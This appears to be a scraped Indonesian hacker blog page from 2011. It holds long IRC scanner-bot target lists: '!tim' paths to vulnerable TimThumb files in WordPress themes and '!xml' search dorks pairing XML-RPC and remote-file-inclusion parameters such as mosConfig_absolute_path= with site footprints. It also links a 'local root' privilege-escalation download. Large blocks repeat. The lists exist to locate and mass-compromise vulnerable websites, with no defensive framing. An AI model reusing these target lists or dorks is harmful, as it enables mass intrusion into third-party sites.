!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
!tim /wp-content/themes/sportpress/scripts/timthumb.php "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/eNews/timthumb.php /wp-content/themes/eNews/
!tim /wp-content/themes/Nova/timthumb.php /wp-content/themes/Nova/
!tim /wp-content/plugins/igit-related-posts-with-thumb-images-after-posts/ "/plugins/igit-related-posts-with-thumb-images-after-posts/"
!tim /wp-content/themes/sportpress/scripts/ "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/announcement/functions/thumb.php /themes/announcement/functions/
!tim wp-content/themes/sportpress/scripts/thumb.php "wp-content/themes/sportpress/scripts/"
!tim /wp-content/themes/LightBright/ "wp-content/themes/LightBright/"
!tim /wp-content/themes/Glider "wp-content/themes/Glider"
!tim wp-content/themes/Mystique/cache/ wp-content/themes/Mystique/cache/
!tim wp-content/plugins/uBillboard/ wp-content/plugins/uBillboard/
!tim wp-content/themes/wpuniversity/scripts/timthumb.php "wp-content/themes/wpuniversity/scripts"
!tim /wp-content/themes/mypolylens/sp-framework /wp-content/themes/mypolylens/sp-framework
!tim /wp-content/themes/sakura/plugins/woo-tumblog/ /wp-content/themes/sakura/plugins/woo-tumblog/
!tim /wp-content/themes/directorypress/ /wp-content/themes/directorypress/
!tim /wp-content/plugins/autofashion/ /wp-content/plugins/autofashion
!tim /wp-content/themes/WPFanPro2.0/lib/scripts/timthumb.php "/wp-content/themes/WPFanPro2.0/lib"
!tim /wp-content/themes/versatile /wp-content/themes/versatile
!tim /wp-content/themes/classifiedstheme/thumbs/ "/wp-content/themes/classifiedstheme/thumbs/"
!tim /wp-content/plugins/akismet/ "/wp-content/plugins/akismet/"
!tim /wp-content/gd-star-rating/ "/wp-content/gd-star-rating/"
!tim /wp-content/themes/Memoir/ "/wp-content/themes/Memoir/"
!tim /blog/wp-content/themes/clockstone/images/
!tim /wp-content/themes/mio/sp-framework/timthumb/timthumb.php "/themes/mio/"
!tim /wp-content/themes/coda/ "/themes/coda/"
!tim /wp-content/themes/OptimizePress/ "/wp-content/themes/OptimizePress/"
/wp-content/themes/TheStyle/
/wp-content/themes/nool/
/wp-content/themes/PersonalPress/
/wp-content/themes/SimplePress/
/wp-content/themes/DeepFocus/
/wp-content/themes/DelicateNews/
/wp-content/themes/Bold/
/wp-content/themes/eStore/
/wp-content/themes/TheProfessional/
/wp-content/themes/OnTheGo/
/wp-content/themes/AskIt/
/wp-content/themes/Nova/
/wp-content/themes/eNews/
/wp-content/themes/eVid/
/wp-content/themes/TheCorporation/
/wp-content/themes/Minimal/
/wp-content/themes/Polished/
/wp-content/themes/MyResume/
/wp-content/themes/TheSource/
/wp-content/themes/StudioBlue/
/wp-content/themes/Wooden/
/wp-content/themes/WhosWho/
/wp-content/themes/Quadro/
/wp-content/themes/Glow/
/wp-content/themes/Modest/
/wp-content/themes/Aggregate/
/wp-content/themes/ArtSee/
/wp-content/themes/versatile/
/wp-content/themes/omni-shop/
/wp-content/themes/manifesto/scripts/
/wp-content/themes/arthem-mod/scripts/
/wp-content/themes/echoes/
/wp-content/themes/Bold4/
/wp-content/themes/primely-theme/scripts/
/wp-content/themes/zenkoreviewRD/scripts/
/wp-content/themes/ElegantEstate/
/wp-content/themes/PersonalPress2/
/wp-content/themes/mypage/scripts/
/wp-content/themes/magazinum/scripts/
/wp-content/themes/pbv_multi/scripts/
/wp-content/themes/photofeature/scripts/
/wp-content/themes/ColdStone/
/wp-content/themes/HMDeepFocus/
/wp-content/themes/EarthlyTouch/
/wp-content/themes/Boutique/
/wp-content/themes/ePhoto/
/wp-content/themes/PureType/
/wp-content/themes/13Floor/
/wp-content/themes/BusinessCard/
/wp-content/themes/CherryTruffle/
/wp-content/themes/Cion/
/wp-content/themes/DailyNotes/
/wp-content/themes/eGallery/
/wp-content/themes/eGamer/
/wp-content/themes/GrungeMag/
/wp-content/themes/Influx/
/wp-content/themes/LightBright/
/wp-content/themes/LightSource/
/wp-content/themes/Magnificent/
/wp-content/themes/Memoir/
/wp-content/themes/AskIt_v1.6/AskIt/
/wp-content/themes/TidalForce/
/wp-content/themes/Atlantis/
/wp-content/themes/DelicateNewsYellow/
/wp-content/themes/themorningafter/
/wp-content/themes/arthemia-premium/scripts/
/wp-content/themes/arthemia/scripts/
/wp-content/themes/arthemia-premium-park/scripts/
/wp-content/themes/linepress/
/wp-content/themes/wedding/
/wp-content/themes/graduate/
/wp-content/themes/wp-newspaper/
/wp-content/themes/advanced-newspaper/
/wp-content/themes/journey/
/wp-content/themes/newspro/
/wp-content/themes/transcript/
/wp-content/themes/showfolio/
/wp-content/themes/quickstart/
/wp-content/themes/Restorante/
/wp-content/themes/snapwire/
/wp-content/themes/aqua-blue/includes/
/wp-content/themes/swatch/functions/
/wp-content/themes/announcement/functions/
/wp-content/themes/empire/functions/
/wp-content/themes/supportpress/functions/
/wp-content/themes/editorial/functions/
/wp-content/themes/statua/functions/
/wp-content/themes/briefed/functions/
/wp-content/themes/faultpress/functions/
/wp-content/themes/kaboodle/functions/
/wp-content/themes/savinggrace/functions/
/wp-content/themes/premiere/functions/
/wp-content/themes/simplicity/functions/
/wp-content/themes/deliciousmagazine/functions/
/wp-content/themes/canvas-buddypress/functions/
/wp-content/themes/bookclub/functions/
/wp-content/themes/boldnews/functions/
/wp-content/themes/placeholder/functions/
/wp-content/themes/biznizz/functions/
/wp-content/themes/auld/functions/
/wp-content/themes/listings/functions/
/wp-content/themes/elefolio/functions/
/wp-content/themes/chapters/functions/
/wp-content/themes/continuum/functions/
/wp-content/themes/diner/functions/
/wp-content/themes/skeptical/functions/
/wp-content/themes/caffeinated/functions/
/wp-content/themes/crisp/functions/
/wp-content/themes/sealight/functions/
/wp-content/themes/unite/functions/
/wp-content/themes/estate/functions/
/wp-content/themes/tma/functions/
/wp-content/themes/coda/functions/
/wp-content/themes/inspire/functions/
/wp-content/themes/apz/functions/
/wp-content/themes/spectrum/functions/
/wp-content/themes/diarise/functions/
/wp-content/themes/boast/functions/
/wp-content/themes/retreat/functions/
/wp-content/themes/cityguide/functions/
/wp-content/themes/cinch/functions/
/wp-content/themes/slanted/functions/
/wp-content/themes/canvas/functions/
/wp-content/themes/postcard/functions/
/wp-content/themes/delegate/functions/
/wp-content/themes/mystream/functions/
/wp-content/themes/optimize/functions/
/wp-content/themes/backstage/functions/
/wp-content/themes/sophisticatedfolio/functions/
/wp-content/themes/bueno/functions/
/wp-content/themes/digitalfarm/functions/
/wp-content/themes/headlines/functions/
/wp-content/themes/f0101/functions/
/wp-content/themes/royalle/functions/
/wp-content/themes/exposure/functions/
/wp-content/themes/rockstar/functions/
/wp-content/themes/dailyedition/functions/
/wp-content/themes/object/functions/
/wp-content/themes/antisocial/functions/
/wp-content/themes/coffeebreak/functions/
/wp-content/themes/mortar/functions/
/wp-content/themes/bigeasy/functions/
/wp-content/themes/groovyphoto/functions/
/wp-content/themes/groovyblog/functions/
/wp-content/themes/mainstream/functions/
/wp-content/themes/featurepitch/functions/
/wp-content/themes/suitandtie/functions/
/wp-content/themes/thejournal/functions/
/wp-content/themes/myweblog/functions/
/wp-content/themes/aperture/functions/
/wp-content/themes/metamorphosis/functions/
/wp-content/themes/bloggingstream/functions/
/wp-content/themes/thestation/functions/
/wp-content/themes/groovyvideo/functions/
/wp-content/themes/productum/functions/
/wp-content/themes/newsport/functions/
/wp-content/themes/irresistible/functions/
/wp-content/themes/cushy/functions/
/wp-content/themes/wootube/functions/
/wp-content/themes/forewordthinking/functions/
/wp-content/themes/geometric/functions/
/wp-content/themes/abstract/functions/
/wp-content/themes/busybee/functions/
/wp-content/themes/blogtheme/functions/
/wp-content/themes/gothamnews/functions/
/wp-content/themes/thick/functions/
/wp-content/themes/typebased/functions/
/wp-content/themes/overeasy/functions/
/wp-content/themes/ambience/functions/
/wp-content/themes/snapshot/functions/
/wp-content/themes/openair/functions/
/wp-content/themes/freshfolio/functions/
/wp-content/themes/papercut/functions/
/wp-content/themes/proudfolio/functions/
/wp-content/themes/vibrantcms/functions/
/wp-content/themes/freshnews/functions/
/wp-content/themes/livewire/functions/
/wp-content/themes/gazette/functions/
/wp-content/themes/flashnews/functions/
/wp-content/themes/premiumnews/functions/
/wp-content/themes/newspress/functions/
/wp-content/themes/8q/scripts/
/wp-content/themes/aerial/lib/
/wp-content/themes/aesthete/
/wp-content/themes/albizia/includes/
/wp-content/themes/amphion-lite/script/
/wp-content/themes/aranovo/scripts/
/wp-content/themes/arras/library/
/wp-content/themes/arras-theme/library/
/wp-content/themes/arthemix-bronze/scripts/
/wp-content/themes/artisan/includes/
/wp-content/themes/arthemix-green/scripts/
/wp-content/themes/a-simple-business-theme/scripts/
/wp-content/themes/a-supercms/
/wp-content/themes/aureola/scripts/
/wp-content/themes/aurorae/
/wp-content/themes/autofashion/
/wp-content/themes/automotive-blog-theme/Quick%20Cash%20Auto/
/wp-content/themes/bikes/
/wp-content/themes/automotive-blog-theme/
/wp-content/themes/black_eve/
/wp-content/themes/blex/scripts/
/wp-content/themes/bloggnorge-a1/scripts/
/wp-content/themes/blogified/
/wp-content/themes/blue-corporate-hyve-theme/
/wp-content/themes/bluemag/library/
/wp-content/themes/blue-news/scripts/
/wp-content/themes/bombax/includes/
/wp-content/themes/breakingnewz/
/wp-content/themes/brightsky/scripts/
/wp-content/themes/brochure-melbourne/includes/
/wp-content/themes/business-turnkey/assets/js/
/wp-content/themes/calotropis/includes/
/wp-content/themes/coffee-lite/
/wp-content/themes/comet/scripts/
/wp-content/themes/conceditor-wp-strict/scripts/
/wp-content/themes/constructor/layouts/
/wp-content/themes/constructor/libs/
/wp-content/themes/constructor/
/wp-content/themes/coverht-wp/scripts/
/wp-content/themes/cover-wp/scripts/
/wp-content/themes/dark-dream-media/
/wp-content/themes/deep-blue/
/wp-content/themes/delicate/
/wp-content/themes/diamond-ray/
/wp-content/themes/dieselclothings/
/wp-content/themes/digitalblue/
/wp-content/themes/dimenzion/
/wp-content/themes/epione/script/
/wp-content/themes/evr-green/scripts/
/wp-content/themes/famous/megaframe/megapanel/
/wp-content/themes/famous/
/wp-content/themes/fashion-style/
/wp-content/themes/featuring/
/wp-content/themes/fliphoto/
/wp-content/themes/flix/
/wp-content/themes/fordreporter/scripts/
/wp-content/themes/freeside/
/wp-content/themes/fresh-blu/scripts/
/wp-content/themes/go-green/modules/
/wp-content/themes/granite-lite/scripts/
/wp-content/themes/greydove/
/wp-content/themes/greyzed/functions/efrog/lib/
/wp-content/themes/gunungkidul/
/wp-content/themes/heartspotting-beta/
/wp-content/themes/heli-1-wordpress-theme/images/
/wp-content/themes/ideatheme/
/wp-content/themes/impressio/timthumb/
/wp-content/themes/introvert/
/wp-content/themes/inuit-types/
/wp-content/themes/isotherm-news/
/wp-content/themes/iwana-v10/
/wp-content/themes/jambo/
/wp-content/themes/jcblackone/
/wp-content/themes/kratalistic/
/wp-content/themes/life-style-free/
/wp-content/themes/likehacker/
/wp-content/themes/litepress/scripts/
/wp-content/themes/loganpress-premium-theme-1/
/wp-content/themes/magazine-basic/
/wp-content/themes/magup/
/wp-content/themes/make-money-online-theme-1/scripts/
/wp-content/themes/make-money-online-theme-2/scripts/
/wp-content/themes/make-money-online-theme-3/scripts/
/wp-content/themes/make-money-online-theme-4/scripts/
/wp-content/themes/make-money-online-theme/scripts/
/wp-content/themes/meintest/layouts/
/wp-content/themes/mobilephonecomparision/
/wp-content/themes/moi-magazine/
/wp-content/themes/my-heli/images/
/wp-content/themes/mymag/
/wp-content/themes/mystique/extensions/auto-thumb/
/wp-content/themes/nash/theme-assets/php/
/wp-content/themes/neofresh/
/wp-content/themes/neo_wdl/includes/extensions/
/wp-content/themes/new-green-natural-living-ngnl/scripts/
/wp-content/themes/newspress/
/wp-content/themes/pearlie/scripts/
/wp-content/themes/pico/scripts/
/wp-content/themes/postage-sydney/includes/
/wp-content/themes/premium-violet/
/wp-content/themes/probluezine/
/wp-content/themes/pronto/cjl/pronto/uploadify/check.php
/wp-content/themes/pronto/cjl/pronto/uploadify/uploadify.php
/wp-content/themes/r755/
/wp-content/themes/regal/
/wp-content/themes/shaan/
/wp-content/themes/shadow-block/
/wp-content/themes/shadow/
/wp-content/themes/simple-but-great/
/wp-content/themes/simplenews_premium/scripts/
/wp-content/themes/simple-red-theme/
/wp-content/themes/simple-tabloid/
/wp-content/themes/simplewhite/
/wp-content/themes/slidette/timThumb/
/wp-content/themes/snowblind_colbert/
/wp-content/themes/snowblind/
/wp-content/themes/spotlight/
/wp-content/themes/squeezepage/
/wp-content/themes/standout/
/wp-content/themes/suffusion/
/wp-content/themes/swift/includes/
/wp-content/themes/swift/includes/
/wp-content/themes/swift/
/wp-content/themes/techozoic-fluid/options/
/wp-content/themes/the_dark_os/tools/
/wp-content/themes/themetiger-fashion/
/wp-content/themes/theory/
/wp-content/themes/the-theme/core/libs/thumbnails/
/wp-content/themes/thrillingtheme/
/wp-content/themes/tm-theme/js/
/wp-content/themes/totallyred/scripts/
/wp-content/themes/travelogue-theme/scripts/
/wp-content/themes/true-blue-theme/
/wp-content/themes/ttnews-theme/
/wp-content/themes/typographywp/
/wp-content/themes/ugly/
/wp-content/themes/unity/
/wp-content/themes/versitility/
/wp-content/themes/vibefolio-teaser-10/scripts/
/wp-content/themes/vina/
/wp-content/themes/whitemag/script/
/wp-content/themes/wpapi/
/wp-content/themes/wpbus-d4/includes/
/wp-content/themes/wp-creativix/scripts/
/wp-content/themes/wp-newsmagazine/scripts/
/wp-content/themes/wp-perfect/js/
/wp-content/themes/wp-premium-orange/
/wp-content/themes/xiando-one/
/wp-content/themes/zcool-like/
/wp-content/themes/zcool-like/uploadify.php
/wp-content/themes/twittplus/scripts/
bogel
Kamis, 22 Desember 2011
Sabtu, 19 Maret 2011
local root versi bogel ( video mode on )
hehehee.. ketemu lagi :P :P :P :P
langsung aja om seperti judul ..
download ->> http://www.mediafire.com/?6tu953t7ev2t70z
-= bogel @reload-x.us =- http://bogel.biz or http://reload-x.us/
langsung aja om seperti judul ..
download ->> http://www.mediafire.com/?6tu953t7ev2t70z
-= bogel @reload-x.us =- http://bogel.biz or http://reload-x.us/
Video Bikin Server IRC + Services Nya
yuhuuu... !! .. nih aq ad sedikit tutorial ( video buat server irc + services nya )
soalnya aq liat di paman google smua pada copas hihihii.. piss bos !!
langsung download aja om ->> http://www.mediafire.com/?ppxcuqqn2eji6er
-= bogel @reload-x.us =- http://bogel.biz/ or http://reload-x.us/
soalnya aq liat di paman google smua pada copas hihihii.. piss bos !!
langsung download aja om ->> http://www.mediafire.com/?ppxcuqqn2eji6er
-= bogel @reload-x.us =- http://bogel.biz/ or http://reload-x.us/
Senin, 28 Februari 2011
dOrK XML
!xml active/components/xmlrpc/client.php?c[components]= /Pindorama/
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus"
!xml /nucleus/xmlrpc/server.php "index.php?blogid="
!xml /nucleus/xmlrpc/server.php "The Nucleus Group"
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /xmlrpc.php /amfx
!xml /amfx/xmlrpc.php "BlazeDS"
!xml /amfx/xmlrpc.php "anything"
!xml /xmlrpc.php dev-php/PEAR-XML_RPC
!xml xmlrpc.php "PEAR-XML_RPC"
!xml xmlrpc.php "phpxmlrpc"
!xml xmlrpc.php "/PEAR-XML_RPC"
!xml xmlrpc.php "/pear"
!xml xmlrpc.php "/SRPMS"
!xml xmlrpc.php "/php-pear"
!xml xmlrpc.php "phpMyFAQ"
!xml xmlrpc.php "PHPXMLRPC"
!xml xmlrpc.php "Trustix"
!xml xmlrpc.php "Strayhorn"
!xml /xmlrpc.php /modules.php?op=modload
!xml /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
!xml /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
!xml /xmlrpc.php "XML-RPC library"
!xml /pingserver.php /pMachine+pnSession+pmserver+pm
!xml /pingserver.php /pMachine+pm
!xml /pingserver.php /pMachine+index.php
!xml /pingserver.php /pMachine,pMachine
!xml /xmlrpc.php /include+phpMyFAQ
!xml /xmlrpc.php TikiWiki+utils.php
!xml /xmlrpc.php powered+by+postnuke
!xml /xmlrpc.php "BLOG:CMS"
!xml /xmlrpc.php "faultString XML error: no element found at line 1"
!xml /xmlrpc.php "PEAR XML_RPC"
!xml /xmlrpc.php "Xoops"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlrpc.php "postnuke"
!xml /xmlrpc.php "dailyblog"
!xml /xmlrpc.php phpgroupware
!xml /xmlphp.php "XML-RPC for PHP"
!xml /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /drupal/xmlrpc.php callback
!xml /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /xmlrpc.php "Squirrelcart"
!xml /xmlrpc.php "Powered By Wordpress"
!xml /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
!xml /xmlrpc.php "com_pollxt"
!xml /adxmlrpc.php /phpAdsNew/ site:.it
!xml /xmlrpc.php "action"+"poll_ident"
!xml /xmlrpc.php "webcalendar"
!xml /WordPress WordPress 1.2.1
!xml /b2/xmlsrv/xmlrpc.php /b2+site:.it
!xml /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
!xml /blog/xmlrpc.php /blog+site:.it
!xml /blog/xmlsrv/xmlrpc.php /blog+site:.it
!xml /blogs/xmlrpc.php /blogs+site:.it
!xml /blogs/xmlsrv/xmlrpc.php /blogs+site:.it
!xml /blogtest/xmlsrv/xmlrpc.php /blogtest+site:.it
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /blogs/b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus" site:it
!xml /nucleus/xmlrpc/server.php "index.php?blogid=" site:.it
!xml /nucleus/xmlrpc/server.php "The Nucleus Group" site:.it
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml /faq/xmlrpc.php "/index.php?p=faq"
!xml /faq/xmlrpc.php "/index.php?pg=faq"
!xml /faq/xmlrpc.php "/index.php?pag=faq"
!xml /faq/xmlrpc.php "/index.php?page=faq"
!xml /faq/xmlrpc.php "/?faq"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path= "com_sitemap"
!xml /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path= "com_videodb"
!xml /ch_readalso.php?read_xml_include= "Copyrights ? 2005 Belgische Federale Overheidsdiensten"
!xml /include/monitoring/engine/MakeXML.php?fileOreonConf= "oreon.conf.php"
!xml /include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf= "common-Func-ACL.php"
!xml /sitemap.xml.php?dir[classes]= "class.pages.php"
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus"
!xml /nucleus/xmlrpc/server.php "index.php?blogid="
!xml /nucleus/xmlrpc/server.php "The Nucleus Group"
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
!xml /nucleus/xmlrpc/server.php 'index.php?catid=' + blogid
!xml /nucleus/xmlrpc/server.php 'index.php?itemid='
!xml xmlrpc.php "This web site was made with PostNuke"
!xml xmlrpc.php "Web site powered by PostNuke"
!xml /faq/xmlrpc.php "powered by phpmyFAQ"
!xml xmlrpc.php "by the Tiki community"
!xml phpgroupware/xmlrpc.php "This Site is powered by phpWebSite"
!xml xmlrpc.php "This website is powered by eGroupWare's"
!xml xmlrpc.php "This website is powered by WordPress"
!xml adxmlrpc.php "phpAdsNew"
!xml xmlrpc.php "by each individual author, All Rights Reserved"
!xml /xmlrpc.php /amfx
!xml /amfx/xmlrpc.php "BlazeDS"
!xml /amfx/xmlrpc.php "anything"
!xml /xmlrpc.php dev-php/PEAR-XML_RPC
!xml xmlrpc.php "PEAR-XML_RPC"
!xml xmlrpc.php "phpxmlrpc"
!xml xmlrpc.php "/PEAR-XML_RPC"
!xml xmlrpc.php "/pear"
!xml xmlrpc.php "/SRPMS"
!xml xmlrpc.php "/php-pear"
!xml xmlrpc.php "phpMyFAQ"
!xml xmlrpc.php "PHPXMLRPC"
!xml xmlrpc.php "Trustix"
!xml xmlrpc.php "Strayhorn"
!xml /xmlrpc.php /modules.php?op=modload
!xml /xmlrpc.php Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom!
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes* WordPress ME *
!xml /xmlsrv/xmlrpc.php/xmlsrv/xmlrpc.php /wp-includes+wordpress
!xml /xmlsrv/xmlrpc.php "Valid XHTML 1.0! Valid CSS! Valid RSS! Valid Atom"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlsrv/xmlrpc.php "Original template design by Free CSS Templates"
!xml /xmlrpc.php "XML-RPC library"
!xml /pingserver.php /pMachine+pnSession+pmserver+pm
!xml /pingserver.php /pMachine+pm
!xml /pingserver.php /pMachine+index.php
!xml /pingserver.php /pMachine,pMachine
!xml /xmlrpc.php /include+phpMyFAQ
!xml /xmlrpc.php TikiWiki+utils.php
!xml /xmlrpc.php powered+by+postnuke
!xml /xmlrpc.php "BLOG:CMS"
!xml /xmlrpc.php "faultString XML error: no element found at line 1"
!xml /xmlrpc.php "PEAR XML_RPC"
!xml /xmlrpc.php "Xoops"
!xml /xmlsrv/xmlrpc.php "Original template design by François PLANQUE."
!xml /xmlrpc.php "postnuke"
!xml /xmlrpc.php "dailyblog"
!xml /xmlrpc.php phpgroupware
!xml /xmlphp.php "XML-RPC for PHP"
!xml /nucleus/xmlrpc.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /drupal/xmlrpc.php callback
!xml /nucleus/xmlrpc/server.php Nucleus © 2002-2004 The Nucleus Group - Donate!
!xml /xmlrpc.php "Squirrelcart"
!xml /xmlrpc.php "Powered By Wordpress"
!xml /xmlrpc.php RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP
!xml /xmlrpc.php "com_pollxt"
!xml /adxmlrpc.php /phpAdsNew/ site:.it
!xml /xmlrpc.php "action"+"poll_ident"
!xml /xmlrpc.php "webcalendar"
!xml /WordPress WordPress 1.2.1
!xml /b2/xmlsrv/xmlrpc.php /b2+site:.it
!xml /b2evo/xmlsrv/xmlrpc.php /b2evo+site:.it
!xml /blog/xmlrpc.php /blog+site:.it
!xml /blog/xmlsrv/xmlrpc.php /blog+site:.it
!xml /blogs/xmlrpc.php /blogs+site:.it
!xml /blogs/xmlsrv/xmlrpc.php /blogs+site:.it
!xml /blogtest/xmlsrv/xmlrpc.php /blogtest+site:.it
!xml xmlrpc.php "a web portal system written in PHP."
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP"
!xml xmlrpc.php "* RSS 2.0 * Comments RSS 2.0 * Valid XHTML * WP" "powered by wordpress"
!xml xmlrpc.php RSS 2.0 * Comments RSS 2.0
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml /nucleus/xmlrpc/server.php "Nucleus CMS v3.2 * Valid XHTML"
!xml serendipity_xmlrpc.php "Welcome to the Serendipity Administration Suite"
!xml xmlrpc.php "WordPress Module * WordPress ME * WordPress"
!xml serendipity_xmlrpc.php "Powered by. Serendipity PHP Weblog"
!xml /nucleus/xmlrpc/server.php "2003-2004, Radek Hulán"
!xml tiki-xmlrpc_services.php tiki-*.php
!xml xmlrpc.php "[ * powered by b2 * ]"
!xml xmlrpc.php /b2-include/xmlrpcs.inc on line 182
!xml /xmlsrv/xmlrpc.php /blogs/b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions.php
!xml /xmlsrv/xmlrpc.php /b2evocore/_functions_xmlrpcs.php on line 1
!xml xmlrpc.php wp-includes/class-xmlrpcs.php on line 255
!xml serendipity_xmlrpc.php "Powered by Serendipity"
!xml serendipity_xmlrpc.php "Open login screen"
!xml /b2/xmlsrv/xmlrpc.php "powered by b2"
!xml /nucleus/xmlrpc/server.php "Nucleus" site:it
!xml /nucleus/xmlrpc/server.php "index.php?blogid=" site:.it
!xml /nucleus/xmlrpc/server.php "The Nucleus Group" site:.it
!xml /xmlsrv/xmlrpc.php 'index.php?blog='
